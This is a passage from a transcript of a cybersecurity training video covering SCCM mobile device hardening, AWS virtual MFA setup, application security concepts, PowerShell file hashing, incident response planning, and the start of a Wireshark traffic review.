tracking is sometimes good for remote tracking, but in another sense we also might want to disable it. Such as
for members of the military or law enforcement that might use organizationally supplied smartphone devices.
Also, we might disable the camera or microphone for privacy reasons.
Finally, we can also enable data loss prevention, or DLP, to the installation of a software agent on the mobile
device that is controlled by a central management solution. Data loss prevention means we want to prevent or
minimize any sensitive data from being leaked outside of the organization. So a software agent gets installed
on the device and centralized policies that we get to configure will determine how sensitive data is treated. So
for example, we might make sure that users of a smartphone have the inability to send e-mail attachments that
contain sensitive data to external e-mail addresses outside of the organization.
[Video description begins] Topic title: Configure Mobile Device Hardening Policies. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll configure centralized mobile device hardening policies. There are plenty of tools out
there that let you do this, like MobileIron or Microsoft System Center Configuration Manager, along with
Microsoft Intune. So in this case, we'll be using Microsoft System Center Configuration Manager. So here in
my Server 2016 installation, I've already installed SCCM, System Center Configuration Manager. So I'm going
to go ahead and fire up the System Center Config Manager console.
[Video description begins] The System Center Configuration Manager window is divided into four parts. The
first part is the menu bar. The second part is the address bar. The third part is divided into two sections. The
first section is the Administration pane. It contains the Overview root node, which includes the Cloud Services
subnode. The second section includes the Assets and Compliance and Monitoring options. The fourth part is
the content pane. It displays the Administration page. It has two expandable sections. The first section is the
Navigation Index, and the second section is the Recent Alerts (0) - Last updated: 1/8/2019 10:24:37
AM. [Video description ends]
The next thing I need to do is to go into the Assets and Compliance workspace.
[Video description begins] He clicks the Assets and Compliance option. The Assets and Compliance pane
opens in the first section of the third part and the Compliance Settings page opens in the content pane. The
Assets and Compliance pane contains the Overview root node. This node includes the Compliance Settings
subnode. [Video description ends]
So I've clicked on that in the bottom-left and then in the left hand navigator, I'll expand Compliance Settings.
[Video description begins] The Compliance Settings subnode includes the Configuration Items and
Configuration Baselines options. [Video description ends]
I need to create what is called a configuration item that contains my mobile device hardening settings.
[Video description begins] He clicks the Configuration Items option. The content pane includes a table. This
table has the column headers: Icon, Name, Type, Device Type, Revision, Child, Relationships, User Setting,
and Date Modified. [Video description ends]
Then I need to add it to a configuration baseline and deploy that to a collection of devices.
[Video description begins] He clicks the Configuration Baselines option. The content pane includes a table
and the Summary and Deployments tabs. The table has the column headers: Icon, Name, Status, Deployed,
User Setting, Date Modified, Compliance Count, Noncompliance Count, Failure Count, and Modified
By. [Video description ends]
Then we'll be hardening our mobile environment. So I'm going to start by right-clicking on Configuration
Items and choosing Create Configuration Item.
[Video description begins] He right-clicks the Configuration Items option and selects the Create
Configuration Item option. The Create Configuration Item Wizard opens. It displays the General page. This
page includes the Name text box, Android and Samsung KNOX radio button, and the Next button. [Video
description ends]
I'm going to call this Harden Lollipop, because we're going to apply this to the Android version 5 operating
system which is called Lollipop. Android always has great, yummy, sweet names for its operating system
versions, like Marshmallow, and in this case Lollipop.
[Video description begins] He types Harden Lollipop in the Name text box. [Video description ends]
So down below, I'm going to choose Android and Samsung KNOX and then I'll click Next.
[Video description begins] He selects the Android and Samsung KNOX radio button. [Video description ends]
Then I can expand the Android operating system, and I can determine the specific versions.
[Video description begins] The Supported Platforms page is displayed. It contains the Android node. [Video
description ends]
So maybe I want to exclude version 4, this is only for Android 5, and then Next.
[Video description begins] The Android node contains the Android KNOX Standard 4.0 and higher, Android
4, and Android 5 checkboxes. These are selected. [Video description ends]
[Video description begins] He clears the Android KNOX Standard 4.0 and higher and Android 4
checkboxes. [Video description ends]
[Video description begins] The Device Settings page is displayed. It includes the Select all, Security,
Encryption, and Compliant and Noncompliant Apps (Android) checkboxes. [Video description ends]
Because a lot of security breaches could potentially stem from people running or installing and running apps
that are not allowed to be run on the machine.
[Video description begins] He selects the Compliant and Noncompliant Apps (Android) checkbox. [Video
description ends]
They might contain malware, they could reduce the security of the device. So I'm actually going to turn on the
check mark for Encryption, Security, and Password as well, and then I'll click Next.
[Video description begins] The Password page is displayed. It includes the Require password settings on
devices drop-down list box, Minimum password length (characters) and Password expiration in days
checkboxes, and the Idle time before device is locked drop-down list box. Each of the checkboxes has a spin
box attached to them. The Minimum password length (characters) and Password expiration in days
checkboxes and the Idle time before device is locked drop-down list box are disabled. [Video description ends]
First thing, we've got passwords settings. So I'm going to go ahead and choose Required.
[Video description begins] He selects the Required option in the Require password settings on devices drop-
down list box. The Minimum password length (characters) and Password expiration in days checkboxes and
the Idle time before device is locked drop-down list box get enable. [Video description ends]
And maybe I would set an option such as the fact that the minimum password length needs to be at least 8
characters, and maybe password expiration in days, maybe a 7.
[Video description begins] He selects the Minimum password length (characters) checkbox and sets the value
of the spin box, adjacent to it, to 8. [Video description ends]
[Video description begins] He selects the Password expiration in days checkbox and sets the value of the spin
box, adjacent to it, to 7. [Video description ends]
There should be no guesswork here when I'm configuring it at this level. Maybe the idle time before the device
is locked, 5 minutes. So you get the idea, we can configure these types of items.
[Video description begins] He selects the 5 minutes option in the Idle time before device is locked drop-down
list box. [Video description ends]
I'll go ahead and click Next. Then I can determine for example, in this case whether the camera is Allowed or
Prohibited.
[Video description begins] The Security page is displayed. It includes the Camera drop-down list box. [Video
description ends]
Maybe Prohibited if it's only work use and we have no need of the camera for work purposes. I'll click Next.
[Video description begins] He selects the Prohibited option in the Camera drop-down list box. [Video
description ends]
And maybe file encryption on the device, I'll apply that as being turned on.
[Video description begins] The Encryption page is displayed. It includes the File encryption on device drop-
down list box. [Video description ends]
[Video description begins] He selects the On option in the File encryption on device drop-down list
box. [Video description ends]
Well I can click, may have to add let's say the Google Authenticator App is going to be an important part of an
Android device being compliant with these security settings.
[Video description begins] He clicks the Next button. The Android App Compliance page is displayed. It
includes the Add button and the Noncompliant apps list: Use this list to specify the Android apps that will be
reported as noncompliant and the Compliant apps list: Use this list to specify the Android apps that users are
allowed to install. Any other apps will be reported as noncompliant radio buttons. The Noncompliant apps
list: Use this list to specify the Android apps that will be reported as noncompliant radio button is selected by
default. [Video description ends]
[Video description begins] He clicks the Add button. The Add App to the Noncompliant List dialog box opens.
It contains the Name, Publisher, and App URL text boxes and the Add and Cancel buttons. [Video description
ends]
[Video description begins] He types Google Authenticator in the Name text box. [Video description ends]
I've already searched up the Google Authenticator, so I can just go ahead and copy the URL from the URL box
in my browser. And then I can simply paste that into the App URL. So I'll go ahead and add that one, of course
we could add more.
[Video description begins] He clicks the Add button, and the Add App to the Noncompliant List dialog box
closes. [Video description ends]
And I can determine whether I want to look at this from a noncompliant or a compliant perspective.
[Video description begins] He hovers over the Noncompliant apps list: Use this list to specify the Android
apps that will be reported as noncompliant and the Compliant apps list: Use this list to specify the Android
apps that users are allowed to install. Any other apps will be reported as noncompliant radio buttons. [Video
description ends]
So if it's noncompliant, it means use this list to specify the apps that will be reported as noncompliant. Well, I
want this to be compliant.
[Video description begins] He selects the Compliant apps list: Use this list to specify the Android apps that
users are allowed to install. Any other apps will be reported as noncompliant radio button. [Video description
ends]
So if they've got the Google Authenticator, that is good for additional authentication factors for security, then
I'll click Next.
[Video description begins] The Platform Applicability page is displayed. [Video description ends]
And I'm not going to add any exclusions, click Next, and Next again.
[Video description begins] The Summary page is displayed. [Video description ends]
And finally after a moment, we will have created our configuration item
[Video description begins] The Progress page is displayed. [Video description ends]
[Video description begins] The Completion page is displayed. [Video description ends]
Close out of that and let's just go back to the config manager console.
[Video description begins] He clicks the Close button, and the Create Configuration Item Wizard
closes. [Video description ends]
And there it is, harden the Lolipop operating system. We see the config item.
[Video description begins] The Icon column displays the icon. The Name column header has the value,
Harden Lollipop. The Type column header has the value, General. The Device Type column header has the
value, Mobile. The Revision column header has the value, 1. The Child column header has the value, No. The
Relationships column header has the value, No. The User Setting column header has the value, No. The Date
Modified column header has the value, 1/8/2019 10:28 AM. [Video description ends]
So I'm going to go ahead here and go under Configuration Baselines and I'm going to build a new one as you
add config items to it.
[Video description begins] He right-clicks the Configuration Baselines option and selects the Create
Configuration Baseline option. The Create Configuration Baseline dialog box opens. It includes the Name text
box, the Add drop-down button, and the OK button. [Video description ends]
I'm going to call this Harden Android Baseline.
[Video description begins] He types Harden Android Baseline in the Name text box. [Video description ends]
And then down below, I'm going to click Add > Configuration Items and I'll choose the Harden Lollipop item
we just created and I'll add that. Click OK and OK.
[Video description begins] He clicks the Add drop-down button and selects the Configuration Items option.
The Add Configuration Items dialog box opens. It is divided into two parts. The first parts is Available
configuration items. The second section is Configuration items that will be added to this configuration
baseline. Available configuration items includes a table and the Add button. The table has five column
headers: Name, Type, Latest Revision, Description, and Status. The Name column header includes the value,
Harden Lollipop. The Type column header includes the value, General. The Latest Revision column header
includes the value, 1. The Description column header has no value. The Status column header includes the
value, Enabled. Configuration items that will be added to this configuration baseline includes a table and the
OK button. The table has five column headers: Name, Type, Latest Revision, Description, and Status. These
columns do not have any value. [Video description ends]
[Video description begins] He selects the Harden Lollipop value in the Name column header and clicks the
Add button. The Name, Type, Latest Revision, and Status columns headers of the table in Configuration items
that will be added to this configuration baseline get populated with the values, Harden Lollipop, General,
Revision 1, and Enabled, respectively. He then clicks the OK button to close the Add Configuration Items
dialog box. [Video description ends]
Next thing to do is to right-click on the baseline and to deploy it to a collection of mobile devices.
[Video description begins] He clicks the OK button to close the Create Configuration Baseline dialog
box. [Video description ends]
[Video description begins] The Icon column displays the icon. The Name column header includes the value,
Harden Android Baseline. The Status column header includes the value, Enabled. The Deployed column
header includes the value, No. The User Setting column header includes the value, No. The Date Modified
column header includes the value, 1/8/2019 10:28 AM. The Compliance Count column header includes the
value, 0. The Noncompliance Count column header includes the value, 0. The Failure Count column header
includes the value, 0. The Modified By column header includes the value, FAKEDOMAIN. [Video description
ends]
And here in config manager, I can specify the collection that I want to deploy this configuration baseline to.
[Video description begins] He right-clicks the Harden Android Baseline value in the Name column header and
selects the Deploy option. The Deploy Configuration Baselines dialog box opens. It includes the Collection
text box, the Remediate noncompliant rules when supported checkbox, and the Run every spin box. A Browse
button is present adjacent to the Collection text box. The Allow remediation outside the maintenance window
checkbox is present below the Remediate noncompliant rules when supported checkbox. It is disabled. [Video
description ends]
So I'll go ahead and click Browse. And here, I'm going to go into Device Collections.
[Video description begins] The Select Collection dialog box opens. It is divided into three parts. The first part
contains a drop-down list box and the Root folder. The second part contains the Filter search box and a table
with the column headers: Name and Member Count. The Name column header includes the value, All Users.
The Member Count column header includes the value, 2. The third part includes the OK button. [Video
description ends]
I might have a specific collection for mobile devices. There is a built-in one here called All Mobile Devices.
[Video description begins] He clicks the drop-down list box in the first part and selects the Device Collections
option. The Name column header includes the value, All Mobile Devices. The Member Count column header
includes the value, 0. [Video description ends]
I don't have any mobile devices being managed by a CCM here yet. But if you did, you would see a numeric
value here other than 0 under the Member Count for the All Mobile Devices collection, click OK. Also, I'm
going to choose to remediate noncompliance when it's found.
[Video description begins] The Select Collection dialog box closes. [Video description ends]
So if the camera is enabled for example, then I'm going to choose to remediate that by disabling the camera.
[Video description begins] He selects the Remediate noncompliant rules when supported checkbox. The Allow
remediation outside the maintenance window checkbox gets enabled. [Video description ends]
I'm going to run this compliance against these mobile devices everyday.
[Video description begins] He sets the value of the Run every spin box to 1. [Video description ends]
And then I'm going to click OK. And now if I select our Android baseline hardening item, I can go down to
Deployments here at the bottom.
[Video description begins] The Deploy Configuration Baselines dialog box closes. [Video description ends]
And I can see that it's been deployed to the All Mobile Devices collection.
[Video description begins] The Deployments tab includes a table with the column headers: Icon, Collection,
Compliance %, Deployment Start Time, and Action. The Icon column header displays the icon image. The
Collection column header has the value, All Mobile Devices. The Compliance % column header has the value,
0.0. The Deployment Start Time column header has the value, 1/8/2019 10:29 AM. The Action column header
has the value, Remediate. [Video description ends]
[Video description begins] Topic title: Enable a Smartphone as a Virtual MFA Device. The presenter is Dan
Lachance. [Video description ends]
These days, multi-factor authentication is all the rage when it comes to securing user accounts, especially using
an out of band mechanism to communicated codes such as to a smartphone with an app installed. So in this
example, I'm going to enable a smartphone as a virtual MFA or multi-factor authentication device for use with
Amazon Web Services.
[Video description begins] The AWS Management Console web page is open. It is divided into four parts. The
first part includes the Services drop-down button. The second part is AWS services. It contains the Find
services search box and the Recently visited services and All services expandable sections. The All services
expandable section is expanded. It includes the Compute and Machine Learning sections. The Compute
section includes the EC2 and ECR options. The Machine Learning section includes the Amazon SageMaker
and AWS DeepLens options. The second part is Access resources on the go. The third part is Explore
AWS. [Video description ends]
To start with, you need an account with Amazon Web Services or AWS. I've already got one, and I've signed
in to the administrative console. The next thing I'm going to do here, in the AWS Management Console, is I'm
going to take a look at any existing users I might have created in the past. Now, I've already got a user here
that has been added to a group. So we're going to go to take a look at it because we're going to enable MFA, or
multi-factor authentication, for that user. So let's get to it. Let's scroll down, under Security, Identity &
Compliance, I'm going to click IAM, which stands for Identity and Access Management.
[Video description begins] The IAM Management Console web page is displayed. It is divided into three parts.
The first part is the navigation pane. It includes the Users option. The second part is the content pane. The
third part is Feature Spotlight. [Video description ends]
[Video description begins] The content pane includes a table and the Add User and Delete User buttons. The
table has the column headers: User name, Groups, Access key page, Password age, Last activity, and MFA .
The User name column header has the value, jchavez. The Groups column header has the value,
LasVegas_HelpDesk. The Access key age column header has the value, None. The Password age column
header has the value, 34 days. The Last activity column header has the value, 34 days. The MFA column
header has the value, Not enabled. [Video description ends]
And here we have a user called jchavez, that is a member of the LasVegas_HelpDesk group, which gives them
certain permissions to manage AWS cloud resources. But our purpose here is I'm going to click on the
username because we want to enable MFA.
[Video description begins] He clicks the jchavez value in the User name column header. The Summary page
opens. It includes the Permissions and Security credentials tabs. [Video description ends]
And in the user information, I want to go to the Security credentials tab. We can see the assigned MFA device
says Not assigned.
[Video description begins] The Security credentials tab includes the Sign-in credentials section. It includes the
text, Assigned MFA device Not assigned | Manage. Manage is a link. [Video description ends]
[Video description begins] The Manage MFA device dialog box opens. It includes the Virtual MFA device
radio button and the Continue button. The Virtual MFA device radio button is selected. [Video description
ends]
Now, we could use a physical security key or hardware token, physically some kind of device. But here, we're
going to enable a virtual MFA device, which means I've got an authenticator app installed on my smartphone.
And if I don't, I'd have to go the appropriate app store to install it. So I'm going to go ahead and choose
Continue.
[Video description begins] He clicks the Continue button. The Set up virtual MFA device dialog box opens. It
includes the text, 1. Install a compatible app on your mobile device or computer See a list of compatible
applications 2. Use your virtual MFA app and your device's camera to scan the QR code, 3. Type two
consecutive MFA codes below, and Previous and Assign MFA buttons. list of compatible applications in the
text, See a list of compatible application, is a link. A box displaying a link, Show QR code, is present below the
text, Use your virtual MFA app and your device's camera to scan the QR code. The MFA code 1 and MFA
code 2 text boxes are given below the text, 3. Type two consecutive MFA codes below. The Assign MFA button
is disabled. [Video description ends]
Now at this point, it tells me to install the compatible app on my mobile device or computer. And if I go to the
list of compatible apps, it'll tell me what is supported.
[Video description begins] He clicks the list of compatible applications link. The Multi-Factor Authentication
web page opens. [Video description ends]
So if I go down, I can see for my virtual MFA device, I can determine which item I can install on a particular
type of platform. So for example, for Android, which I've got, I can install the Google Authenticator.
Anyways, that is fine.
[Video description begins] He closes the Multi-Factor Authentication web page. [Video description ends]
But the next thing we have to do is use the virtual MFA app on the device's machine or on the device to scan
the QR code that will show up here. I'm going to click here that QR code.
[Video description begins] He clicks the Show QR code link. The QR code is displayed in the box. [Video
description ends]
So I'm going to pause for a moment here. I'm going to install the Google Authenticator on my Android and I'm
going to scan this QR code. Once you've scanned the QR code with your authenticator app, in my case Google
Authenticator, that is what I've chosen. The next thing to do is to put in the code that it's going to be
displaying. So the app on your smartphone will be generating a code that changes periodically. So you have a
certain window of time to enter that in before you'll be able to authenticate.
[Video description begins] He types 119558 in the MFA code 1 text box. [Video description ends]
So for example, I'll pop in the code that is being displayed on my device, and then I'll wait for the next code to
show up. It wants two codes before we can complete this procedure.
[Video description begins] He types 293978 in the MFA code 2 text box. The Assign MFA button gets
enabled. [Video description ends]
[Video description begins] The Set up virtual MFA device message box opens. It displays the message, You
have successfully assigned virtual MFA This virtual MFA will be required during sign-in. It also displays the
Close button. [Video description ends]
And it now tells me that I have successfully assigned the virtual MFA for this account.
[Video description begins] He clicks the Close button, and the message box closes. The Summary page
includes the text, User ARN arn:aws:iam::611279832722:user/jchavez. The Security credentials tab includes
the text, Summary Console sign-in link: https://611279832722. signin.aws.amazon.com/console. [Video
description ends]
And it says that this virtual MFA, multi-factor authentication, will be required during sign-in, in this case, for
this particular user, which is jchavez, as we can see listed all the way up here.
Notice here in Amazon Web Services while we're under the Security credentials tab, that we've got the console
sign-in link for this particular user. Why don't we fire that up and try to log in as that user and see what
happens?
[Video description begins] He opens the Amazon Web Services Sign-In web page. It includes the Account ID
or alias, IAM user name, and Password text boxes and the Sign In button. The Account ID or alias text box
has the value, 611279832722. The IAM user name and Password text boxes are blank. [Video description
ends]
So when I'm pop in that URL, it knows the Account ID. So I have to enter the IAM user name for Amazon
Web Services along with the password, I still need to know that. But then when I click Sign In, it should
require me to enter something else.
[Video description begins] He types jchavez in the IAM user name text box and password in the Password text
box. [Video description ends]
Because that is multi-factor authentication and that something else would only be available if I have my
smartphone where I've configured that authentication. So it's waiting for me to enter the MFA Code.
[Video description begins] He clicks the Sign In button. The MFA Code text box, the Submit button, and the
Cancel link appear. [Video description ends]
So all I would do on my smartphone is fire up, in my case, my Google Authenticator app. And for a certain
period of time, a code will be displayed before it changes to something else. So I'm going to go ahead and
enter in the code that is displayed currently to see if I can authenticate.
[Video description begins] He types 351264 in the MFA Code text box and clicks the Submit button. The error,
Your authentication information is incorrect. Please try again, appears above the Account ID or alias, IAM
user name, and Password text boxes and the Sign In button. [Video description ends]
Sometimes if you're not quick enough with the code, it might expire before it'll let you in. So let's go ahead and
try this again.
[Video description begins] He types password in the Password text box and clicks the Sign In button. The
MFA Code text box, the Submit button, and the Cancel link appear. [Video description ends]
I just you have to wait for the code to update, it's just about expired on my smartphone app. Okay, let's try this
again.
[Video description begins] He types 139381 in the MFA Code text box and clicks the Submit button. He gets
logged in to AWS Management Console. The user name, jchavez @ 6112-7983-2722, is present in the web
page. He hovers over this user name. [Video description ends]
Upon completion of this video, you will be able to recognize how security is applied to applications from
design to implementation.
Objectives
[Video description begins] Topic title: Securing Applications. The presenter is Dan Lachance. [Video
description ends]
Securing applications is an important aspect of cybersecurity. Whether we're talking about applications people
use personally or, of course, those also used for business productivity.
[Video description begins] Securing Applications [Video description ends]
The first consideration within an organization is whether off-the-shelf applications are being used, straight
from an app store, for example, in a mobile device environment. In which case, we want to make sure that
digital signatures are trusted. Most apps in common app stores are digitally signed by the organizations that
build them. And this digital signature can't be easily forged, and so it establishes a chain of trust. We trust that
the author of this application has built an application that is trustworthy. We've got a digital signature. At the
same time we can also have an organizational list of only approved apps that can be installed from specific app
stores.
In some cases, organizations can even build their own custom organizational app stores and make apps
available for business productivity that they control in that specific app store. Organizations can also
commission the creation, or they can build their own custom built applications. We also have to consider
where apps are being used in the sense of geofencing. If we've got a sensitive app that really should only be
used within the perimeter of a facility, or a campus, well then, we can configure geofencing so that the app
only works within that location. Securing applications also means dealing with access control. In other words,
dealing with an identity store where user accounts would exist. Or in some cases we also have devices that
authenticate to an application even without user intervention.
Or software can communicate with other pieces of software automatically, again, with no user intervention.
But either way, it's access control, it's a unique identity, and we need to make sure that strong authentication is
being used beyond just username and password type of authentication. Access control also deals with granting
a specific level of permission to a resource for an entity such as a user or a group. And so we want to make
sure that adhere to the principle of least privilege, where we're only applying the permissions that are required
to perform a task, and nothing more. We should also consider whether we want to audit failed access attempts.
There is this notion also of application wrapping, whereby we can add user authentication to a specific
application.
You might have one app that is highly sensitive that requires further additional authentication beyond what the
user might already use, to sign into their laptop or their desktop or their phone. And so application wrapping
lets us add additional authentication to an app, even if the app doesn't support it internally, so we can add that
additional level of security. Logging is always an important of security and certainly that is the case when it
comes to tracking application activity. We should always make sure that, first of all logging is enabled for app
usage.
And that we store additional copies of logs on a centralized logging host on a protected network. And that can
even be automated when it comes to configuring devices to forward specific log events elsewhere. Securing an
application also means changing default settings. Such as where the app installed itself in terms of the file
system hierarchy. Changing any account names or passwords specifically associated with the app. So we never
stick with defaults when it comes to hardening an environment, that also applies to securing applications. If
your organization is building a custom application, then the development team will adhere to the software
development life cycle.
[Video description begins] Software Development Life Cycle [Video description ends]
Of course, if you use off-the-shelf software, commercial software, those programming teams also adhered to
this model. Where we have a number of different phases such as the requirements phase, what do we need
these software to do. Then, we can analyze whether there is already a solution out there or whether we're going
to do a custom built solution. Then we start designing the solution, followed by actual coding by programmers.
Which is then followed by testing, make sure that the code is secure, and that the application is functional and
meets requirements. Finally, we can then deploy the solution. Now, why are we talking about this? We're
talking about securing applications, and the point here is that through each and every of these SDLC phases,
security must be thought of. We don't want to get to the point where we are testing and then realize we should
think about security. Or get to the point where we're actually writing code, and then start thinking about
security. Security needs to be a part of every software development life cycle phase. For web applications, we
can use a web application firewall, otherwise called a WAF, W-A-F.
The purpose of the web application firewall is to check for web application types of attacks, such as directory
traversal attacks. Or SQL injection attacks. Cross-site scripting attacks and many, many more. So it's a
specialized application level firewall for web-based applications. Another option is to consider using load
balancing or a reverse proxying solution. Where a client requests for an application would hit a public
interface, for instance, of a load balancer. Which in turn would determine which of the back end servers are
actually hosting the app are the least busy, and forward the request to it. So if this way we're hiding true server
identities for our application servers.
Encryption is always a good idea when it comes to securing applications. The network level, we can think of
using HTTPS. Now, HTTPS means that we've got access to a web application through a URL, and that the
server needs a PKI certificate. And ideally, the server will be configured to use not SSL, not even a SSL
version three, but rather TLS. And this way, we have a secure way of exchanging keys and information during
that encrypted session. We can also use virtual private networks or VPNs to allow people to work remotely.
They establish an encrypted tunnel with an endpoint, for example, a VPN concentrator on the premises or the
company location, and everything between the user device and that VPN concentrator is encrypted. Also we
might use IPsec. IPsec allows us to control very specifically which type of IP traffic is encrypted, even all of it.
And this happens regardless of application, it's not like we have to configure a PKI certificate for a specific
web app on a server like we would with HTTPS. So IPsec is much more broad in its potential application or
usage. Of course, it's always important to secure data at rest with encryption, such as in the file system,
encrypting files or folders, or disk volumes. Encrypting databases or replicas of databases that we might have
out there. The OWASP top 10 is very important when it comes to securing applications. You might be
wondering why? Why is it so important? OWASP stands for the Open Web Application Security Project. And
if you've never heard of this or taking it into account in the past, it deals with different types of web application
security vulnerabilities.
That are then open to attacks like injection attacks or authentication that might be broken in an app, or security
misconfigurations. And every year there is an OWASP top 10, in terms of top 10 vulnerabilities, that gets
published. So OWASP is really focused on web app security, and also provides tools for securing and testing
web applications. So OWASP is a very important when it comes to having a discussion about securing
specifically web applications. Developers can also use the OWASP ESAPI. Now what this is is the Enterprise
Security API, which allows developers to use secure coding functions that are already built and trusted.
[Video description begins] Topic title: Implement File Hashing. The presenter is Dan Lachance. [Video
description ends]
In this demonstration, I'll implement file hashing using Microsoft Windows PowerShell. File hashing allows us
to generate a unique value based on the contents of a file. And we can compare that in the future when we run
file hashing again to see if those two unique hashes or values are the same.
Because if they're not, something has changed in the file. And so this is used often by forensic investigators
that gather IT digital evidence to ensure that data hasn't been tampered with. And it adheres to the chain of
custody.
[Video description begins] The Windows Powershell window is open. It displays the prompt, PS D:\work\
Projects_Sample_Files>. [Video description ends]
So the first thing I'm going to do here on my machine is point out that I've navigated to drive D, where I've got
some folders with some sample files. If I do a dir, we've got three project files, they're just text files.
[Video description begins] He executes the command: dir. The output displays a table with four column
headers: Mode, LastWriteTime, Length, and Name. The Mode column header has the value, -a----, for all the
rows. The LastWriteTime column header has the value, 11/08/16 12:32 PM, for all the rows. The Length
column header has the values, 456, 912, and 26112. The Name column header has the values, Project_A.txt,
Project_B.txt, and Project_C.txt. The prompt does not change. [Video description ends]
What I'm going to do is use the get-filehash PowerShell commandlet. And I'm going to specify *, because I
want to get a filehash or generate a hash for each and every file within this current subdirectory. When I press
Enter, we can see the file hashes that are applied to each of the files.
[Video description begins] He executes the command: get-filehash *. The output displays a table with three
column headers: Algorithm, Hash, and Path. The Algorithm column has the values, SHA256, for all the rows.
The hash column header has the values,
62BC9ADF78D284822208F008ED68093059FF2AD61BE9332EC21AFB77A6480CA7,
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286EF2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A95AAF. The Path column
header has the values, D:\work\Projects_Sample_Files, for all the rows. The prompt does not change. [Video
description ends]
Now, what I'm going to do is make a change to the Project_A.txt file. I'll just use Notepad to do that. Then
we're going to come back and run get-filehash again to see if any of the hashes are different. So I'm just going
to run notepad here. And I'm going to run it against project_a.txt.
[Video description begins] He executes the command: notepad project_a.txt. The Project_A.txt file opens. It
displays the text, Sample text. The prompt does not change. [Video description ends]
And I'm just going to go ahead and make a change to the file. So maybe I'll just add Changed in the first line,
and I will close and save files. So the Project_A.txt file that has been changed, we can agree on that. So I'm
going to use my up arrow key to go back to my command history. And once again, I'm going to run get-
filehash against all files in the current directory.
[Video description begins] He executes the command: get-filehash *, again. The output displays a table with
three column headers: Algorithm, Hash, and Path. The Algorithm column has the values, SHA256, for all the
rows. The hash column header has the values,
89814AB289AE01A11FC7CEFD1574E469B0DF0DB4C64DD8ED84A365F5AFBD4F28,
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286EF2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A95AAF. The Path column
header has the values, D:\work\Projects_Sample_Files, for all the rows. The prompt does not change. [Video
description ends]
Notice for the first entry, Project_A, you can't really see the file name, it's off the screen. But notice that the
hash originally began with 62BC9.
And it no longer begins with that, why? Because the file contents have changed, it's not the same file anymore.
But notice that the other file hashes respectively for the Project_B and Project_C files have remained the same.
And the reason for that is because they have not been modified.
So file hashing can definitely be useful if we want to detect whether something has been tampered with or
changed since the original hash was generated.
[Video description begins] Topic title: Incident Response Planning. The presenter is Dan Lachance. [Video
description ends]
We've all experienced at some point what it's like to be ill prepared for a situation, it's not a good feeling. And
so this is what incident response planning is all about, planning ahead of time.
So it's proactive planning for IT security incidents, in terms of what will our response be when these negative
things happen. Now, these occurrences could be network outages, could be host downtime, perhaps due to
hardware failures or a malicious user compromise of that host. It could be a malware outbreak, could be an
incident related to cybercrime, or sensitive data loss. Either way, we want to make sure that we've planned for
all of these items ahead of time. Often, the incident response planning, and you can have more than one of
these for different aspects of systems and data within the organization.
Often these plans stem from a business impact analysis that was already conducted previously, when we
determine what the negative consequences are of threats being realized against assets. The recovery time
objective or the RTO is an important factor to consider when it comes to incident response planning. This is set
by the organization and normally it's measured in minutes or hours and it relates to a specific system. We're
talking about the maximum amount of tolerable downtime. So for example, if server 1 is a crucial server that is
used to generate revenue or something along those lines.
Perhaps we've determined that the RTO for server 1 can be no more than 2 hours, otherwise it has
unacceptable negative consequences against the organization. The other factor to consider is the recovery point
objective, the RPO. This one deals with the maximum amount of tolerable data loss. So for example, if we
determine that the company can afford to lose up to a maximum of 24 hours worth of a specific type of data,
then that would be the RPO. And that would dictate then, that we have to take backups of data at least once
every 24 hours. The incident response team is a collection of people that should know what their roles and
responsibilities are when incidents occur such as, who are the first responders?
And who do we escalate to, if we have an incidence that occurs and it falls outside of our skill set or our legal
ability to do something about it. Who do we escalate to? This needs to be known ahead of time and not during
the confusion of an incident actually in the midst of occurring. Well, how are we going to make that work? It's
actually very, very simple. We need to put aside some time to conduct periodic drills related to negative
incidence occurring, so that we can gauge the effectiveness of the incident response plan and people, that
ideally hopefully will know their roles. There should be a periodic review related to the results of those
periodic drills. Maybe there needs to be more training provided, and maybe more frequent drills, to make sure
that people know exactly how to respond when negative incidents occur. When an incident response plan
needs to get created.
[Video description begins] Creating an Incident Response Plan [Video description ends]
And remember, this is just specific to a business process, or an IT system supporting a business process or a
subset of data. So you're going to have a lot of these incident response plans. The first thing you do when you
create it, is identify the critical system or data that the response plan pertains to. Then, identify threat
likelihood against that asset. Identify single points of failure which might be as simple as having a single
Internet connection when we rely on data stored in the public cloud. We then need to assemble the incidence
response team, and then create the plan.
Now, the incident response plans will contain procedures, specifics for how to recover from negative incident,
such as system recovery steps, or data restoration procedures. And it might also specify which tools should be
used such as disk imaging tools or alternative boot mechanisms, perhaps, which might be used to remove
infections of malware on a machine. It can't be removed when the machine is booted normally. Tools could
also include things like contact lists that incident responders would use when they need to escalate.
In this video, you will view a packet capture to identify suspicious activity.
Objectives
[Video description begins] Topic title: Examine Network Traffic for Security Incidents. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll examine network traffic, looking for security incidents. That can kind of feel like
looking for a needle in a haystack if you're doing it manually. And in this example, we will do it manually.
We're going to use the Wireshark free packet capturing tool to examine some packet captures.
But certainly, there are appliances, whether they're virtual machines or physical hardware devices, that you can
acquire, that will do a rigorous, detailed network analysis looking for anomalies. Often though, you're going to
have to feed it what is normal on your network, a security baseline, before it can determine what is suspicious.
So here, I've got a packet capture taken previously.
[Video description begins] The Wi-Fi window is open. It is divided into six parts. The first part is the menu
bar. The second part is the toolbar. The third part includes the Apply a display filter ... <Ctrl-/> search box.
The fourth part contains a table with the column headers: No., Time, Source, Destination, Protocol, Length,
and Info. The No. column header includes the values: 1196 and 1197. The Time column header includes the
values: 9.557259 and 9.557402. The Source column header includes the values: 1.1.1.1 and 192.168.0.20. The
Destination column header includes the value: 192.168.0.9. The Protocol column header includes the value:
TCP. The Length column header includes the value: 58. The Info column header includes the value: 38283 ->
80 [SYN] Seq=0 Win=1024 Len=0 MSS=1460. The fifth part includes the statement: Transmission Control
Protocol, Src Port: 38283, Dst Port: 80, Seq: 0, Len: 0. The sixth part includes 0000 9a de d0 a9 d9 39 18 56
80 c3 68 ba 08 00 45 00 .....9.V ..h...E. [Video description ends]
And this is something you might do periodically, kind of like a random spot check. Just start packet captures
on networks where you're allowed to do that, save the packet capture files for later analysis. You might simply
go through them out of interest because it is very interesting. But at the same time, you might also look for
